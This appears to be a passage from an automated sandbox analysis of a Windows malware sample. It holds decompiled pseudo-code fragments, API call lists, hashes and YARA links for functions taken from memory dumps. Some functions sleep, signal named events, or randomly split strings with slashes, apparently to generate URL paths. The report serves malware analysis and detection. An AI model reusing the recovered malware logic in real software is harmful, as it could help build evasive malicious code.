					}
					_t31 = E04CD1000(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4cdd108( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04CD5AB2(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                                                                                          0x04cd7cc8
                                                                                                                          0x04cd7ccf
                                                                                                                          0x04cd7cd9
                                                                                                                          0x04cd7cdd
                                                                                                                          0x04cd7ce3
                                                                                                                          0x04cd7cf2
                                                                                                                          0x04cd7cf9
                                                                                                                          0x04cd7cfd
                                                                                                                          0x04cd7d0f
                                                                                                                          0x04cd7d11
                                                                                                                          0x04cd7d11
                                                                                                                          0x04cd7d16
                                                                                                                          0x04cd7d1d
                                                                                                                          0x04cd7d74
                                                                                                                          0x04cd7d74
                                                                                                                          0x04cd7d7a
                                                                                                                          0x04cd7d7c
                                                                                                                          0x04cd7d7c
                                                                                                                          0x04cd7d86
                                                                                                                          0x04cd7d8a
                                                                                                                          0x04cd7d9c
                                                                                                                          0x04cd7d9c
                                                                                                                          0x04cd7da0
                                                                                                                          0x04cd7da6
                                                                                                                          0x04cd7da6
                                                                                                                          0x00000000
                                                                                                                          0x04cd7d36
                                                                                                                          0x04cd7d3b
                                                                                                                          0x04cd7d43
                                                                                                                          0x04cd7d47
                                                                                                                          0x04cd7d4b
                                                                                                                          0x04cd7d4b
                                                                                                                          0x04cd7d58
                                                                                                                          0x04cd7d5c
                                                                                                                          0x04cd7d60
                                                                                                                          0x04cd7db5
                                                                                                                          0x04cd7dbb
                                                                                                                          0x04cd7dbb
                                                                                                                          0x04cd7d6e
                                                                                                                          0x04cd7d72
                                                                                                                          0x04cd7da9
                                                                                                                          0x04cd7dab
                                                                                                                          0x04cd7dae
                                                                                                                          0x04cd7dae
                                                                                                                          0x00000000
                                                                                                                          0x04cd7dab
                                                                                                                          0x04cd7d72
                                                                                                                          0x00000000
                                                                                                                          0x04cd7d5c

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD3CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,058B9B38,00000000,?,?,69B25F44,00000005,04CDD00C,?,?,04CD539B), ref: 04CD3CF8
                                                                                                                            • Part of subcall function 04CD3CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 04CD3D1C
                                                                                                                            • Part of subcall function 04CD3CC2: lstrcat.KERNEL32(00000000,00000000), ref: 04CD3D24
                                                                                                                          • CreateEventA.KERNEL32(04CDD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04CD21B6,?,00000001,?), ref: 04CD7D08
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04CD21B6,00000000,00000000,?,00000000,?,04CD21B6,?,00000001,?,?,?,?,04CD555B), ref: 04CD7D68
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04CD21B6,?,00000001,?), ref: 04CD7D96
                                                                                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04CD21B6,?,00000001,?,?,?,?,04CD555B), ref: 04CD7DAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73268831-0
                                                                                                                          • Opcode ID: 842ba9fc02cdda0c901e793f424e0557c12beb2b56e34d21eef1cd6327459a0b
                                                                                                                          • Instruction ID: 41f26bcca21032a58bd65c8f51ed4b2e19b533ed85a8f14b0fc06960cf15867d
                                                                                                                          • Opcode Fuzzy Hash: 842ba9fc02cdda0c901e793f424e0557c12beb2b56e34d21eef1cd6327459a0b
                                                                                                                          • Instruction Fuzzy Hash: D521E432A027125BD7316E689C84B7B72ABEB88B14B15072BFB47DB140DB38FD018654
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F02A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1384045349-0
                                                                                                                          • Opcode ID: 7f932cee661cacc641da44025e9e8b077a8f819ed135275e6f994e290aabbaed
                                                                                                                          • Instruction ID: b34c489cb46cc008bbadbd2723b8fe11d5cf0ab23e4e7782449adb9cfe504439
                                                                                                                          • Opcode Fuzzy Hash: 7f932cee661cacc641da44025e9e8b077a8f819ed135275e6f994e290aabbaed
                                                                                                                          • Instruction Fuzzy Hash: 4B4107B5C0025CDFDB24CFE4D940BDDBBB9BB48308F5086A9E419AB681EB755A44CF60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD2107, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 40%
                                                                                                                          			E04CD2107(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04CD3946(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04CD65EA(_t23);
						}
					}
					return _t38;
				}
				if(E04CD37AC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4cdd2e4, 1, 0,  *0x4cdd384);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04CD24BE(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04CD282B(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04CD51BB(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04CD7CC7( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                          0x04cd2107
                                                                                                                          0x04cd2114
                                                                                                                          0x04cd211a
                                                                                                                          0x04cd211b
                                                                                                                          0x04cd211c
                                                                                                                          0x04cd211d
                                                                                                                          0x04cd211e
                                                                                                                          0x04cd2122
                                                                                                                          0x04cd212e
                                                                                                                          0x04cd2132
                                                                                                                          0x04cd21ba
                                                                                                                          0x04cd21ba
                                                                                                                          0x04cd21bd
                                                                                                                          0x04cd21bf
                                                                                                                          0x04cd21c7
                                                                                                                          0x04cd21c7
                                                                                                                          0x04cd21cd
                                                                                                                          0x04cd21d0
                                                                                                                          0x04cd21d0
                                                                                                                          0x04cd21cd
                                                                                                                          0x04cd21db
                                                                                                                          0x04cd21db
                                                                                                                          0x04cd2145
                                                                                                                          0x04cd2147
                                                                                                                          0x04cd2147
                                                                                                                          0x04cd215e
                                                                                                                          0x04cd2162
                                                                                                                          0x04cd2165
                                                                                                                          0x04cd2170
                                                                                                                          0x04cd2177
                                                                                                                          0x04cd2177
                                                                                                                          0x04cd2180
                                                                                                                          0x04cd2184
                                                                                                                          0x04cd2192
                                                                                                                          0x04cd2186
                                                                                                                          0x04cd2186
                                                                                                                          0x04cd2187
                                                                                                                          0x04cd2188
                                                                                                                          0x04cd2189
                                                                                                                          0x04cd218a
                                                                                                                          0x04cd218b
                                                                                                                          0x04cd218b
                                                                                                                          0x04cd2197
                                                                                                                          0x04cd219a
                                                                                                                          0x04cd219e
                                                                                                                          0x04cd21a0
                                                                                                                          0x04cd21a0
                                                                                                                          0x04cd21a7
                                                                                                                          0x00000000
                                                                                                                          0x04cd21a9
                                                                                                                          0x04cd21a9
                                                                                                                          0x04cd21b6
                                                                                                                          0x00000000
                                                                                                                          0x04cd21b6

                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(04CDD2E4,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,04CD555B,?,00000001,?), ref: 04CD2158
                                                                                                                          • SetEvent.KERNEL32(00000000,?,?,?,04CD555B,?,00000001,?,00000002,?,?,04CD53C9,?), ref: 04CD2165
                                                                                                                          • Sleep.KERNEL32(00000BB8,?,?,?,04CD555B,?,00000001,?,00000002,?,?,04CD53C9,?), ref: 04CD2170
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,04CD555B,?,00000001,?,00000002,?,?,04CD53C9,?), ref: 04CD2177
                                                                                                                            • Part of subcall function 04CD24BE: WaitForSingleObject.KERNEL32(00000000,?,?,?,04CD2197,?,04CD2197,?,?,?,?,?,04CD2197,?), ref: 04CD2598
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2559942907-0
                                                                                                                          • Opcode ID: 81175a77b50b6e294f9115546da3b24cf1312b2c12875b918dad8d711990f493
                                                                                                                          • Instruction ID: e1bd0d090b32883b4350367a010c0e36279a55a70576e59759a3621435c1af6b
                                                                                                                          • Opcode Fuzzy Hash: 81175a77b50b6e294f9115546da3b24cf1312b2c12875b918dad8d711990f493
                                                                                                                          • Instruction Fuzzy Hash: 4221507BD00219ABDF10AFE488849AEB7BAEB4C354B0585A5EB11E7100D774FE45CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E3308CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 972320c431860451d0cbb62afa00534eced5cdb7b9f37e4a289f7a9cfcfa86ca
                                                                                                                          • Instruction ID: e2ac52026d20e8d00d18fd9a0af3f1b0f91693b8afaad3d62f2c281fee02faab
                                                                                                                          • Opcode Fuzzy Hash: 972320c431860451d0cbb62afa00534eced5cdb7b9f37e4a289f7a9cfcfa86ca
                                                                                                                          • Instruction Fuzzy Hash: 1121C672A056B1EFEB515AFA8C44F5A776D9B02B60F310520E955AB2A4F631E900CDE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD22D2, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E04CD22D2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04CD75F6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                                                                                          0x04cd22de
                                                                                                                          0x04cd22e2
                                                                                                                          0x04cd22e3
                                                                                                                          0x04cd22e4
                                                                                                                          0x04cd22e6
                                                                                                                          0x04cd22e8
                                                                                                                          0x04cd22eb
                                                                                                                          0x04cd22f0
                                                                                                                          0x04cd2387
                                                                                                                          0x04cd238e
                                                                                                                          0x04cd238e
                                                                                                                          0x04cd22f9
                                                                                                                          0x04cd2300
                                                                                                                          0x04cd2310
                                                                                                                          0x04cd2310
                                                                                                                          0x04cd2316
                                                                                                                          0x04cd2318
                                                                                                                          0x04cd231d
                                                                                                                          0x04cd2326
                                                                                                                          0x04cd232c
                                                                                                                          0x04cd2331
                                                                                                                          0x04cd233c
                                                                                                                          0x04cd2340
                                                                                                                          0x04cd2342
                                                                                                                          0x04cd2343
                                                                                                                          0x04cd234c
                                                                                                                          0x04cd2350
                                                                                                                          0x04cd2361
                                                                                                                          0x04cd2352
                                                                                                                          0x04cd2357
                                                                                                                          0x04cd235c
                                                                                                                          0x04cd236b
                                                                                                                          0x04cd236b
                                                                                                                          0x04cd2340
                                                                                                                          0x04cd2371
                                                                                                                          0x04cd2377
                                                                                                                          0x04cd2377
                                                                                                                          0x04cd2380
                                                                                                                          0x04cd2385
                                                                                                                          0x04cd2385
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1198164300-0
                                                                                                                          • Opcode ID: 422b064fcd1ab2eacc4c19857b5d305b872e818f53e1ad14f84bca25f0b78f31
                                                                                                                          • Instruction ID: 5dabbfe31694a82c46da6148f3fde1630b5f10c3a2f692d3d7bcba50cf88763c
                                                                                                                          • Opcode Fuzzy Hash: 422b064fcd1ab2eacc4c19857b5d305b872e818f53e1ad14f84bca25f0b78f31
                                                                                                                          • Instruction Fuzzy Hash: 02214179901209EFCB11DFA8C984E9EBBB9FF89315B1041A9E941E7210EB34EA41DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                          • _free.LIBCMT ref: 6E32F2FB
                                                                                                                          • _free.LIBCMT ref: 6E32F331
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          • Opcode ID: c5d54cabbce9b44703cf292d21172454f27e5a64a1b6c79e008530231cd89d3f
                                                                                                                          • Instruction ID: 0d6434f6b54fb192c635a745ec2053ecfa29ca4017bc12bd6cd36aea464e9b96
                                                                                                                          • Opcode Fuzzy Hash: c5d54cabbce9b44703cf292d21172454f27e5a64a1b6c79e008530231cd89d3f
                                                                                                                          • Instruction Fuzzy Hash: 71110636214A626EEB411AF49CC0DAB329D9BC2779B350A34F2F4A61C0EF22C805C160
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F3F5
                                                                                                                          • _free.LIBCMT ref: 6E32F452
                                                                                                                          • _free.LIBCMT ref: 6E32F488
                                                                                                                          • SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,?,?,6E318835,6E32F53A,?,?,6E2E565E,000008BB,6E37A0D4), ref: 6E32F493
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2283115069-0
                                                                                                                          • Opcode ID: 8b27cbac1f335dfb4338a2d40ee583e072ec55d174ec942082e10cdbaa2cb04f
                                                                                                                          • Instruction ID: 62b231322e250cb7cdf5cb1df1f20cdf6531a7838ba9be3fe84c5243a7b01c4b
                                                                                                                          • Opcode Fuzzy Hash: 8b27cbac1f335dfb4338a2d40ee583e072ec55d174ec942082e10cdbaa2cb04f
                                                                                                                          • Instruction Fuzzy Hash: BC110C327149616EEB612AF99C80DAB33ADABC2779B740A34F5F4A61C0EF71C804C520
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF87F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF88B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF8A0
                                                                                                                          • task.LIBCPMTD ref: 6E2EF8B8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          • Opcode ID: a069ca92dd21cf5a51658edc304eed40881dd856149aafa134e30076ce0b04bb
                                                                                                                          • Instruction ID: f71008d6646097940dd21a7758dc19470aaceb32bf6d5a2284920cf086d7526b
                                                                                                                          • Opcode Fuzzy Hash: a069ca92dd21cf5a51658edc304eed40881dd856149aafa134e30076ce0b04bb
                                                                                                                          • Instruction Fuzzy Hash: 2B214A75D0025CEBCB04CFE4C840BDEBBB9BF48314F508569E429AB684DB306A05CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2EF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F039A
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03A6
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03B2
                                                                                                                            • Part of subcall function 6E2F02A0: task.LIBCPMTD ref: 6E2F03C1
                                                                                                                          • task.LIBCPMTD ref: 6E2EF95F
                                                                                                                          • task.LIBCPMTD ref: 6E2EF96B
                                                                                                                          • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                          • task.LIBCPMTD ref: 6E2EF998
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2520070614-0
                                                                                                                          • Opcode ID: 75c8011f847f043b47264a8f42b196f1f00d33fb983914530ff751fd912789c6
                                                                                                                          • Instruction ID: 0f3554e01893dbeacae2ab6a00d8e5bf714f7af641b3e09a5ac8247c2286d4fe
                                                                                                                          • Opcode Fuzzy Hash: 75c8011f847f043b47264a8f42b196f1f00d33fb983914530ff751fd912789c6
                                                                                                                          • Instruction Fuzzy Hash: 96212A75D0025CEBCB05DFE4C850BDEBBB9BF48314F508569E429AB694DB346A05CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD26DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E04CD26DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4cdd270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4cdd288; // 0x232ec7ae
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4cdd288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                          0x04cd26e5
                                                                                                                          0x04cd26e8
                                                                                                                          0x04cd26ee
                                                                                                                          0x04cd2706
                                                                                                                          0x04cd2708
                                                                                                                          0x04cd270d
                                                                                                                          0x04cd270f
                                                                                                                          0x04cd2712
                                                                                                                          0x04cd2714
                                                                                                                          0x04cd2717
                                                                                                                          0x04cd2719
                                                                                                                          0x04cd2719
                                                                                                                          0x04cd271b
                                                                                                                          0x04cd2726
                                                                                                                          0x04cd272b
                                                                                                                          0x04cd273c
                                                                                                                          0x04cd2744
                                                                                                                          0x04cd2749
                                                                                                                          0x04cd274c
                                                                                                                          0x04cd274f
                                                                                                                          0x04cd2751
                                                                                                                          0x04cd2754
                                                                                                                          0x04cd2757
                                                                                                                          0x04cd2757
                                                                                                                          0x04cd275a
                                                                                                                          0x04cd2765
                                                                                                                          0x04cd276a
                                                                                                                          0x04cd2774

                                                                                                                          APIs
                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04CD1A07,00000000,?,?,04CD4653,?,058B95B0), ref: 04CD26E8
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04CD2700
                                                                                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04CD1A07,00000000,?,?,04CD4653,?,058B95B0), ref: 04CD2744
                                                                                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04CD2765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1819133394-0
                                                                                                                          • Opcode ID: 720c3384a9c9c834397d340060ca56783e76635123f9190f380db0181bd3d9f0
                                                                                                                          • Instruction ID: 9a5d60dbfeb5fbaf7b1c359b0bf681966decf32a3dff56784c7b71bb36246a20
                                                                                                                          • Opcode Fuzzy Hash: 720c3384a9c9c834397d340060ca56783e76635123f9190f380db0181bd3d9f0
                                                                                                                          • Instruction Fuzzy Hash: 4311E976A01214BFD710CE69DC88E9EBBBFDBC0261B150276F505D7250EA74AE44D760
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1E36
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1E43
                                                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E2F1E80
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FCD
                                                                                                                            • Part of subcall function 6E2F0FAE: _Yarn.LIBCPMT ref: 6E2F0FF1
                                                                                                                          • std::exception::exception.LIBCMTD ref: 6E2F1EA5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2425033533-0
                                                                                                                          • Opcode ID: 9f599ae5ba6e4c72b85829a60312cb4cb26266cc690e4f4f23c0ac55cb7ecfa5
                                                                                                                          • Instruction ID: 1f70904abe65f5a8d22576a217788624dc40db0cd044a8eb3a8020751b94b1a1
                                                                                                                          • Opcode Fuzzy Hash: 9f599ae5ba6e4c72b85829a60312cb4cb26266cc690e4f4f23c0ac55cb7ecfa5
                                                                                                                          • Instruction Fuzzy Hash: F20180B5805748DFC7208FAA948058BFFE5BF28254B808A2FE5CE87A01D7309545CB99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD4450, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD4450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4cdd2a4; // 0x2ec
